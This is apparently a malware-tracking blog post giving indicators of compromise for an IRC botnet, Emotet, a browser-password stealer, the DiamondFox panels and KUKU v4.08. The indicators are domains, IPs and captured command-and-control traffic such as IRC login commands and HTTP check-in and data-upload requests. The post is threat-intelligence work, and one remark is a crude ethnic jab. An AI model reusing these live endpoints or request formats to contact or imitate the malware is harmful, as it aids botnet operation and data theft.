gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)

Domains

Domain                    IP
f.eastmoon.pl 148.81.111.101
s.richlab.pl 148.81.111.101
gigasbh.org 82.165.129.253

IRC Traffic

>> NICK {USA-XPx86a}cwecttyo
>> USER cwectty 7949 7840 :cwectty
>> MODE {USA-XPx86a}cwecttyo +iwG
>> JOIN #sp yap
>> PING 422 MOTD
<< 332 {USA-XPx86a}cwecttyo #sp :
<< 333 {USA-XPx86a}cwecttyo #sp x 1436609273
>> PONG 422
>> JOIN #sp yap
>> PING :f4.production.net
>> PONG :f4.production.net
>> JOIN #sp yap

Find the port ur self sniffing with wireshark.

Sample here.

Hosting infos :
http://whois.domaintools.com/82.165.129.253

197.85.182.110(Trojan Emotet hosted in South Africa Cape Town Mweb Connect (proprietary) Limited)

Spawned process "cmd.exe" with commandline "/c C:/winclient.au3" (UID: 00009516-00001892)

Autoit strings inside maybe this malware is also coded in autoit.

Injected into "CCleaner.exe" at 2015-7-2.14:59:47.395 (UID: 00009516-00000996)

Contacts very many different hosts

"197.85.182.110:8080"
"162.144.35.78:8080"
"158.255.238.209:8080"
"198.1.122.176:8080"
"119.59.124.163:8080"
"200.159.128.132:8080"
"88.208.228.111:8080"
"162.144.88.73:8080"
"103.245.153.70:8080"
"103.228.200.37:8080"

POSTs files to a webserver

"POST /b215de35/f5665861/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: 200.159.128.132:8080
Content-Length: 203
Connection: Keep-Alive
Cache-Control: no-cache" with no payload

sample here

Hosting infos
http://whois.domaintools.com/197.85.182.110

upd.upd4ter.com(malware hosted in Spain Madrid Propelin Consulting S.l.u.)

Contacts domains

upd.upd4ter.com

Contacts server

93.189.33.108:80

In general it steals passwords from browsers and get's all the informations from the infected machines.

GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host: upd.upd4ter.com
Cache-Control: no-cache"

Sample here

Hosting infos
http://whois.domaintools.com/93.189.33.108

Gorynych/DiamondFox (hosted in Hungary Budapest Doclerweb Kft)

Thanks to Xylitol for panels and executables.



Panels :

hxxp://computergraphics.in/
hxxp://my-right.fr/
hxxp://bntnl.com/

Files :
PO_37263_pdf.com > bntnl.com/Diamond/Panel/post.php?pl=&slots=1 HTTP/1.1

Xylitol posted a vid with the vulnerability of the Panel.


Now the ruski behind this shit updated the panel.

Hosting infos :
http://whois.domaintools.com/80.77.123.90

KUKU v4.08 beta(Malware hosted in Germany Dortmund 1&1 Internet Ag)

Another version from this malware some domains changed.

makemegood24.com 213.165.83.176
1453eea.makemegood24.com 74.208.153.9
aaakemegood24.com 146.148.34.125
ww11.aaakemegood24.com 166.78.106.200
abakemegood24.com 50.21.181.152
acakemegood24.com 74.208.164.166
adakemegood24.com 74.208.153.9
aeakemegood24.com 87.106.20.192
afakemegood24.com
perfectchoice1.com 193.166.255.171
1459e2b.perfectchoice1.com 193.166.255.171


All hosts

74.208.164.166
87.106.253.18
54.210.47.225
166.78.106.200
87.106.20.192
213.165.83.176
87.106.250.34
193.166.255.171

URL'S

http://1453eea.makemegood24.com/?1453eea=21315306&id=212331279066

GET /?1453eea=21315306&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: 1453eea.makemegood24.com
Cache-Control: no-cache

http://perfectchoice1.com/?1459c9a=21339290&id=212331279066

GET /?1459c9a=21339290&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: perfectchoice1.com
Cache-Control: no-cache

http://aaakemegood24.com/?14540b7=21315767&id=212331279066

GET /?14540b7=21315767&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: aaakemegood24.com
Cache-Control: no-cache

http://adakemegood24.com/?14547fd=21317629&id=212331279066

GET /?14547fd=21317629&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: adakemegood24.com
Cache-Control: no-cache

http://acakemegood24.com/?145454a=21316938&id=212331279066

GET /?145454a=21316938&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: acakemegood24.com
Cache-Control: no-cache

http://ww11.aaakemegood24.com/

GET / HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Connection: Keep-Alive
Cache-Control: no-cache
Host: ww11.aaakemegood24.com

http://abakemegood24.com/?1454374=21316468&id=212331279066

GET /?1454374=21316468&id=212331279066 HTTP/1.1
User-Agent: KUKU v4.08 beta =212331279066
Host: abakemegood24.com
Cache-Control: no-cache

Sample here


Hosting infos :
http://whois.domaintools.com/213.165.83.176